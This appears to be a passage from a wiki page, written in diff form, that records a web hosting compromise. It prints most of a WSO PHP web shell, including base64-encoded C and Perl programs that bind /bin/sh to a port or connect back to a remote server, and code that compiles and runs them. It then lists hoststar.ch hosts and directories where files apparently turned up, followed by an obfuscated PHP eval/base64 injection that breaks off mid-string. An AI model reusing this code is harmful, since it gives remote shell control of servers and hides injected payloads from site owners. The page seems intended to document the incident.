+ | $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; | ||
+ | $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; | ||
+ | echo "<h1>Network tools</h1><div class=content> | ||
+ | <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> | ||
+ | <span>Bind port to /bin/sh</span><br/> | ||
+ | Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> | ||
+ | </form> | ||
+ | <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> | ||
+ | <span>Back-connect to</span><br/> | ||
+ | Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> | ||
+ | </form><br>"; | ||
+ | if(isset($_POST['p1'])) { | ||
+ | function cf($f,$t) { | ||
+ | $w=@fopen($f,"w") or @function_exists('file_put_contents'); | ||
+ | if($w) { | ||
+ | @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); | ||
+ | @fclose($w); | ||
+ | } | ||
+ | } | ||
+ | if($_POST['p1'] == 'bpc') { | ||
+ | cf("/tmp/bp.c",$bind_port_c); | ||
+ | $â = ex("gcc -o /tmp/bp /tmp/bp.c"); | ||
+ | @unlink("/tmp/bp.c"); | ||
+ | $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bpp') { | ||
+ | cf("/tmp/bp.pl",$bind_port_p); | ||
+ | $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bcc') { | ||
+ | cf("/tmp/bc.c",$back_connect_c); | ||
+ | $â = ex("gcc -o /tmp/bc /tmp/bc.c"); | ||
+ | @unlink("/tmp/bc.c"); | ||
+ | $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; | ||
+ | } | ||
+ | if($_POST['p1'] == 'bcp') { | ||
+ | cf("/tmp/bc.pl",$back_connect_p); | ||
+ | $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); | ||
+ | echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; | ||
+ | } | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | if( empty($_POST['a']) ) | ||
+ | if(isset($â) && function_exists('action' . $â)) | ||
+ | $_POST['a'] = $â; | ||
+ | else | ||
+ | $_POST['a'] = 'FilesMan'; | ||
+ | if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | ||
+ | call_user_func('action' . $_POST['a']); | ||
+ | ?> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ---- | ||
+ | |||
+ | login-104.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/ttux207 | ||
+ | |||
+ | login-112.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/ttux223 | ||
+ | |||
+ | login-113.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/ttux225 | ||
+ | |||
+ | login-114.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/ttux227 | ||
+ | |||
+ | login-115.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/ttux229 | ||
+ | |||
+ | login-128.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/tx255 | ||
+ | /home/www/confixx/html/ttux255 | ||
+ | /home/www/confixx/html/tx255.tar.gz | ||
+ | /home/www/confixx/html/ttux255.tar.gz | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4NjFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4NjlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwIl09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpTDFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1VVROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a21ja1JpTG5zVEtuNGlJbklpTG5Ba2RYNVVjMmRsVHNoRWNNaEhUOHhGZU14MlQ0eGpXa05UVXdWR05kVnpXdlYxV2M5V1Qyd2xicVpWWDNsRWNsaFRUS2RXZjhvRVp6a1ZOZHAyTndaR05WdFZYOGRtUlBGM04xVTJjVlpEWDRsVmNkbFdXS2QyYVpCblp0VkZmTkozTjFVMmNWWkRYNGxWY2RsV1dLZDJhWkJuWnRWa1ZUcEdUWEIxSnVJVE55WkdKdUl5Smk0U04xSW5aazR5SnVreUp1SXlKaTR5SjY0R2ZOcGpiV0JWZElkMFQ3TmpWUUpIVndWMmFOWnpXelFqU01oWFRiZDJNWkJuWnhwSGZORm5hc1ZXZXZwMFp0aGpXbkJIUFoxMU1KcFZYOEZsU014RFJXQjFKdUlUTnlaR0p1SXlKaTRTTjFJblprNHlKdWt5SnVJeUppNHlKQVozVk9GbmRYNUVlTnQxWnprRmNtNW1hV0ZsYjBvRVQ0MTBXbk5UV3daV2M2eFhUNDEwV25OVFd3Wm1ibVprVDR4aldrTlRVd1ZHTmRWeld2VjFXYzlXVDJ3bGF6Y0VUbjRpTTFJblprNHlKbjRpSW5JaUwxVWpjbVJpTG40U0tpQWtkWDVVYzJkbFQ5cG5SUVozTndaR05WdFZYOFZsUk94WFYyWUdiWlpqWjR4a1ZQeFdXMWNHYkV4V1o4bDFTbjlXVDIwa2RteFdaOGwxU245V1RMMVVjcXhXWjU5bVNuMUdPYWRHYzhrVlh6a2tXZHhYVUt4RVBFeEdVbjRpTTFJblprNHlKaWNpTDFVamNtUmlMbjBUTXBOSGNrc1RLaWNpTHlVVGF5WkdKdWNTTjN3Vk0xZ0hYMlFUTWNkek00eDFNMUVEWHpVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjJFRFg1WURlY0ZUTXh3Vk8yZ0hYM1FUTWNOVE40eGxNekVEWGlaRGVjRnpOY2RETjR4bE0wRURYM2NEZWNGak5jZFRONHhWTTBFRFhtWkRlY1ZqTXh3MU4wZ0hYeU1UTWNaek40eGxOeEVEWDNVRGVjSnpNeHdsWTJnSFh4Y0RYMlFEZWNaVE14d2xNemdIWDFJVE1jSnpNNHgxTTBFRFg0WURlY0pUTXh3MU4wZ0hYeEVUTWNWek40eGxNeEVEWDRVRGVjUkROeHdGTXpnSFgySVRNY1JtTjR4MU0wRURYM01EZWNOVE54d1ZPMmdIWHlRVE1jWnpONHhsTXlFRFg0VURlY0ZETnh3VlkyZ0hYMVlEWDNVRGVjUkROeHdGWjJnSFh5SVRNY05ETjR4Vk14RURYemNEZWNSak5jUm1ONHgxTTBFRFh4TURlY0pqTXh3Rk8xZ0hYeU1UTWNsek40eGxNeUVEWHpRRGVjTlRNeHdsTTNnSFh3Y1RNY2RUTjR4Vk16RURYek1EZWNGek5jWlRONHhWTjBFRFg0WURlY0pUTXh3VloyZ0hYelFUTWNoak40eEZOMkVEWDBVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjBFRFh6UURlY1JETnh3Rk0zZ0hYd2NUTWNkRE40eDFNMEVEWGhkRGVjRnpOY05tTjR4MU0wRURYd01EZWNaVE14d0ZPMGdIWHhFVE1jbHpNNHhWTXdFRFg1WURlY0pETnh3Vk8zZ0hYMklUTWNkaUwxSVRheVpHSnVjeU56Z0hYelVUTWNsak40eFZNeEVEWDNNRGVjTlROeHdWTzNnSFgxRVRNY1J6TjR4MU0xRURYNVlEZWNKRE54d2xOM2dIWDBVVE1jZERONHhGTjBFRFhoWkRlY1ZqTmNkVE40eEZOMEVEWGtaRGVjSlRNeHdWTzJnSFgwRVRNY2xqTjR4Vk15RURYelFEZWNOVE14d2xZMmdIWHlFVE1jTnpNNHhsTTBFRFhtWkRlY0ZUTXh3Rk8wZ0hYeFFUTWNGbU40eGxNd0VEWHpVRGVjQmpNeHcxTjJnSFgwWURYeU1EZWNKRE54d0ZNM2dIWHlJVE1jTnpNNHhWTXpFRFgxY0RlY1pqTXh3VloyZ0hYeU1UTWNsak40eEZOMndWTzJnSFh4RVRNY0ptTjR4Vk14RURYelFEZWNSVE14d1ZPMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY2xqTjR4Rk4yd1ZPMmdIWHhFVE1jSm1ONHhWTXpFRFg1WURlY0ZUTXh3bFoyZ0hYMFlEWHlNRGVjSkROeHdGTTNnSFh5SVRNY056TTR4Vk16RURYMWNEZWNaak14d1ZaMmdIWHlNVE1jWmpONHhsTnlFRFgzUURlY1JETnh3Rk8yZ0hYMklUTWNSbU40eDFNMEVEWGhaRGVjSkRNeHcxTTFnSFh3SVRNY2RqTjR4Rk4yd2xNemdIWHlRVE1jQnpNNHhGTjFFRFh5TURlY0Z6TXh3Vk4zZ0hYMklUTWNWbU40eGxNekVEWGlaRGVjTmpOeHdGTzBnSFh4RVRNY0J6TjR4Rk4yd0ZaMmdIWHpRVE1jRnpNNHhsTXlFRFg0VURlY0p6TXh3Vk8zZ0hYeUlUTWNORE40eDFNeEVEWDFjRGVjWmpNeHdWWjJnSFh6UVRNY0J6TTR4bE55RURYa1pEZWNORE54dzFOMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY0ppTG40U055SW5aazR5SnpZVE1jRjJONHhsTXhFRFgxY0RlY1pqTXh3VloyZ0hYelFUTWNCek00eGxOeUVEWGtaRGVjTkROeHdWWjJnSFh3WURYaFpEZWNKRE54d1ZNemdIWHlFVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMblV6TmNkek40eDFOeEVEWGxaRGVjUmpOY0p6TTR4bE0wRURYd2NEZWNKak14dzFNemdIWHhNVE1jVnpONHhsTnlFRFhsWkRlY0p6TXh3bE4yZ0hYMklUTWNkRE40eEZOMEVEWDRZRGVjWmpNeHdGWjJnSFh6UVRNY0ZtTjR4Rk4wRURYelVEZWNCak14d1ZOM2dIWDJJVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMbk1qTnh3VlkzZ0hYeUVUTWNObU40eGxOeEVEWDNVRGVjRnpNeHcxTTNnSFh5QVRNY2hUTjR4bE16RURYNWNEZWNGek5jRnpNNHhsTXpFRFhqWkRlY0pUTXh3Rk8wZ0hYelFUTWNWbU40eEZNMndWWTJnSFh5UVRNY2x6TjR4bE53RURYM1FEZWNSRE54dzFZMmdIWHlFVE1jaERONHhsTXhFRFhpNGlNMVFYYW1SQ0x5VWpacFpHSnNVak1tbG1aa2dTWmpGR2J3Vm1jZmRXWnlCM09pSWpNNHhGTTF3Vk4yZ0hYMFFUTWNabU40eDFNMEVEWDFZRGVjUkROeHdsWjFnSFgwWURYMk1EZWNWRE54dzFNM2dIWHhRVE1jSmpONHhGTTF3MVkyZ0hYeFFUTWNaek40eFZOMEVEWHdRRGVjSkNJOUFpTTFRWGFtUnlPaUkyTTR4Vk0xd2xNeWdIWHhZRFhqVkRlY0pETmNoak00eEZOMUVEWHhZRGVjWmpOeHdWTjJnSFhpQVNQZ0lUTm1sbVprc2pJMVFUTWNsak40eEZNd0VEWDVJRGVjTlROY1ZtTTR4Rk0xd0ZNMGdIWGlBU1BnVWpNbWxtWmtjQ0tzRm1kbHRqSXdJRGVjVnpOY0JqTTR4Rk0yd0ZOMmdIWDBRVE1jUmpNNHhsSWcwREkxSVRheVJHSmdzVE4xa21jbVJpTG5raUluNGlNMWttY21SQ0k5QVNOeUluWmtBeU9uZ0RONHhGTjBFRFhqWkRlY0pUTXh3Rk8wZ0hYeUVUTWNkQ0k5QVNOeWttY21SeU9uSTJNNHhWTTF3Vk95Z0hYeVFEWGtORGVjZENJOUFpTTFrbWNtUnlPblFEVjJZV2ZWdFVUbkFTUGdJVE55WkdKN2NDS3VWbmMwVm1ja2NDSTlBU04xSW5aa3N6SnlVRGRwWkdKc0lUTm1sbVprd1NOeVlXYW1SQ0t1SlhZMFZtY2tzekpnMERJMVVUYXlaR0orYVdZZ0tDRnBjM05sZENna1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVEtTa2dlMloxYm1OMGFXOXVJR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KSE1wZXlSbElEMGdJaUk3SUdadmNpQW9KR0VnUFNBd095QWtZU0E4UFNCemRISnNaVzRvSkhNcExURTdJQ1JoS3lzZ0tYc2taU0F1UFNBa2MzdHpkSEpzWlc0b0pITXBMU1JoTFRGOU8zMXlaWFIxY200b0pHVXBPMzFsZG1Gc0tHVjJZV3hzZDJoV1prbFdibGRRWWxRb0p6c3BLU0k5UVZObU4ydDVZVTVTYldKQ1VsaFhkazV1VW1wR1ZWZEtlRmRaTWxaSFNtOVZSMXAyVGxkYWF6bEdUakpWTW1Ob1NrZEpkVXBZWkRCV2JXTTNRbE5MY2pGRlduVkdSV1JhT1RKalIwNVhVVnBzUldKb1dsaGFhMmRwVWxSS2ExcFFiREJhYUZKR1lsQkNSbUZQTVVWaWFGcFlXbWMwTW1Kd1VqTlpkVlp1V2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNU1FVlRhMmh0VlhwTmJVbHZXVEJWUTFveVZFcGtWMWxWZURKVVVXaHRWRTU0VjFreVZsZFFXRTVHV201T1JWcFdiRlpoUms1V1ltaDRWMWt5VmtkS0lpaGxaRzlqWldSZk5EWmxjMkZpS0d4aGRtVW5LU2s3WlhaaGJDaGxkbUZzYkhkb1ZtWkpWbTVYVUdKVUtDYzdLU2tpTjJ0cFNUa3dWRkZxUW1wVlNVWnRTVzlaTUZWRFdqSlVTbVJYV1ZWNE1sUlJhRzFVVG5oWFdUSldWMUJZV2xaamFGcHNZM0JXTWxaVmVGZFpNbFpIU2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNVVYcFdhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3d4YWxGdGFFWlNWbVJGWkdsV1JscERlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdTVk5RT1VWV1V6SlNNbFpLU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRGVVdsWndibEoxVmpKUmMwb3laRko0VjFreVZrZEtJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVXSEJKVTFZeFZXeFZTVnBGVFZsT2JGWjNWV3hXTlZsVlZsWktiRkpVU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkhSc1ZVWmFiRlZHVGpGWWF6QjZVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLSWlobFpHOWpaV1JmTkRabGMyRmlLR3hoZG1VbktTazdaWFpoYkNobGRtRnNiSGRvVm1aSlZtNVhVR0pVS0NjN0tTa2lQWE5VUzNCcmFXTnhUbXhXYWtZd1lXaFNSMWRhVWxoTmFGcFlXbXRuYVdSc1NtNWpNRTVJUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hvUTJKb1dsaGFJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVTM0JKVTFBNVl6SlpjMmhZWWxwU2JsSjBWbXhKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU1hOcmFVa3dXVEZTWVZadVVsaGtiRWx2V1RCVlExb3lWRXBrVjFsVmVESlVVV2h0VkU1NFYxa3lWa2RKYzJ0cFNUbHJSVmRoU2tSaVNFWnRZVXRvVmxkdFdqQldhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hDUTB4d1NVTk5OVEJYVlZBMWExWlZTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRUpEVEhCSlUxQkNOVEpaZUdkdVRWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNRa05NY0VsRFlqUkthbGN5YkdwTlUwcERTMGRPYkZGdE9WVlRia1pIVm5NNVJWVnZOVlZVYzBadFpHeG9VMlZvU201amFFSlRVR2RSU0ZWRmFESmllbVJGWkhWU1JXUlZlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdhMmxKTlZGSVZreHdibFZFZEd0bFV6VnRXWE5LYkdKcFdtNVVlV2RHVFZkS2FsZHRXakZTYVVKdVYwaEdNVm93TURKWmVFbEdWMkZzU0dSSmJFVmpUbWhyVTNaU1ZHSlNNV3RVZVVsc1UzTkNSRlpoV2pCTmFIQnJVMVpTYkZKcldtdFpiM0JHVjJGa1IwNTVTVWRqVTA1VVZ6RmFiR0poU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkdoRFltaGFXRm9pS0dWa2IyTmxaRjgwTm1WellXSW9iR0YyWlNjcEtUdGxkbUZzS0dWMllXeHNkMmhXWmtsV2JsZFFZbFFvSnpzcEtTSTlQWGRQY0dkRFRXdFNSMHBuTUVSSldYQklVbmxvTVZSSlpESlRibmhYV1RKV1Iwb2lLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1R0bGRtRnNLR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KenNwS1NJOVBWRm1PWFJVV0hoelJtRnFSa1ZVWVhSSFZrTmFSbUl4UmpOYWVrNHpZM05HYldSc1VrTkpPVUZEWVdwR1JWUmhkRWRXUTFwR1lqRkdNMXA2VGpOamMwWnRaR3hTUTBrM2EwTmhha1pGVkdGMFIxWkRXa1ppTVVZelducE9NMk56Um0xa2JGSkRUR3hXYkdWSE5WZGFSSGh0V1ROR1JtSm9XbGhhYTJkVFdtczVSMkozYUZoYVp6QkVTVzlPVjFGTmNERmhWVXByVm5OV1dHTnVUak5qZW5oWFdUSldSMG8zYkZOTGJGWnNaVWMxVjFwRWVHMVpNMFpHWW1oYVdGcHJkME5oYWtaRlZHRjBSMVpEV2taaU1VWXpXbnBPTTJOelJtMWtiRkpEUzNsU00yTjVVak5qYjBGcFduQjBWRXR3TUZaTGFWVnNWSGhSVmxNMVdWVldWa3BzVWxSS1EwdEhUbXhSYlRsVlUyNUdSMVp6T1VWVmJ6VlZWSE5HYldSc2RHeFZSbHBzVlVaT01WaHJaMU5hYXpreVdYVldSMko1Vm01TWNFbFRUMjR4YlZOcFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdDVVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLYjFWSFduWk9iV0pzZUcxak1UVlRTMmxyVkZOMGNHdEpiMWt3VlVOYU1sUktaRmRaVlhneVZGRm9iVlJPZUZkWk1sWnRUR1JzYVVrNWEydFNVMVpyVW5kbmJGSlRSa1JXVDFveFlWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNkR3hWUmxwc1ZVWk9NVmhyTkZOTGFUQkVUVlZHYlVsdldUQlZRMW95VkVwa1YxbFZlREpVVVdodFZFNTRWMWt5Vm0xTWNFbFRVRFJSTUZscFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdHBTWFpLYTJKTlNrTkxSMDVzVVcwNVZWTnVSa2RXY3psRlZXODFWVlJ6Um0xa2JEVnBVVzFvUmxKV1pFVmthVlpHV2tONFYxa3lWa2RLZFd0cFNUa3dlbVJOU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRWRFZ6WlNhMk5aT1VWVGJuUXdXbk5HYldSc1VtbE1jRWxUVURSclNGUnBaMmxTVkVwcldsQnNNRnBvVWtaaVVFSkdZVTh4UldKb1dsaGFkV3RwU1Rrd2VscFFTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRFY1VmxkR1dGbFhTbGhoYkdSR1ZuTkdiV1JzVWtOTGRVcEZWR3BrVlZOS09WVlhlSFJYVTBNeFZWSlllRmRaTWxaSFNUbEJRMkZxUmtWVVlYUkhWa05hUm1JeFJqTmFlazR6WTNOR2JXUnNVa05KTjJ0RFRYZG5SRTE0YzFOTGIxVlhZbkJTU0V4d2EybEpPVEJGVTJ0b2JWVjZUVzFKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU3pGUlYySnpZekZWYTJReVVXdFdWbGR3VmpCVmRFWkhZbWhhV0ZwcloxTmFjSFF5WW5aT1IyUnNUa2hSWjNOSVNXeE9TR0pzUWxObU4wSlRTM0JyVTFoWVRrWmFiazVGV2xac1ZtRkdUbFppYUhoWFdUSldSMHBpVmxWVFREa3dWRVE1UmtwdlVWaGFlazVZWVc5QmFXTjJRbE5MY0UxcldtcGtWMVIzV2xoaGVqRnJZM05HYldSc1VrTkpjMGxUWVhaSlEwbDFRVk5MTUVKR1VtODVNbU5JVW01aVJWSklWbk5HYldSc1VrTkpjMGxEWm1sblUxcHJPVWRpZHpGWFlXYzBRMGxwT0dsSmIyY3lXVEJHVjJKbVpGZGFlVUpJUzI5WlYyRWlLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1Rza1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVElEMHhPRGM1TWp0OSI7JGV2YTF0WWxiYWtCY1ZTaXIgPSAiXHg2NVwxNDRceDZmXDE1NFx4NzBcMTcwXHg2NSI7JGV2YTF0WWxkYWtCY1ZTaXIgPSAiXHg3M1wxNjRceDcyXDE2Mlx4NjVcMTY2IjskZXZhMXRZbGRha0JvVlMxciA9ICJceDY1XDE0M1x4NjFcMTU0XHg3MFwxNDVceDcyXDEzN1x4NjdcMTQ1XHg3MlwxNjAiOyRldmExdFlpZG9rQm9WU2pyID0gIlx4M2JcNTFceDI5XDEzNVx4MzFcMTMzXHg3MlwxNTJceDUzXDEyNlx4NjNcMTAyXHg2YlwxNDFceDY0XDE1MVx4NTlcMTY0XHgzMVwxNDFceDc2XDE0NVx4MjRcNTBceDY1XDE0NFx4NmZcMTQzXHg2NVwxNDRceDVmXDY0XHgzNlwxNDVceDczXDE0MVx4NjJcNTBceDZjXDE0MVx4NzZcMTQ1XHg0MFw3Mlx4NjVcMTY2XHg2MVwxNTRceDI4XDQyXHg1Y1w2MVx4MjJcNTFceDNiXDcyXHg0MFw1MFx4MmVcNTNceDI5XDEwMFx4NjlcMTQ1IjskZXZhMXRZbGRva0JjVlNqcj0kZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZbGRha0JvVlMxcik7JGV2YTF0WWxkYWtCY1ZTanI9JGV2YTF0WWxkYWtCY1ZTaXIoJGV2YTF0WWxiYWtCY1ZTaXIpOyRldmExdFlpZGFrQmNWU2pyID0gJGV2Y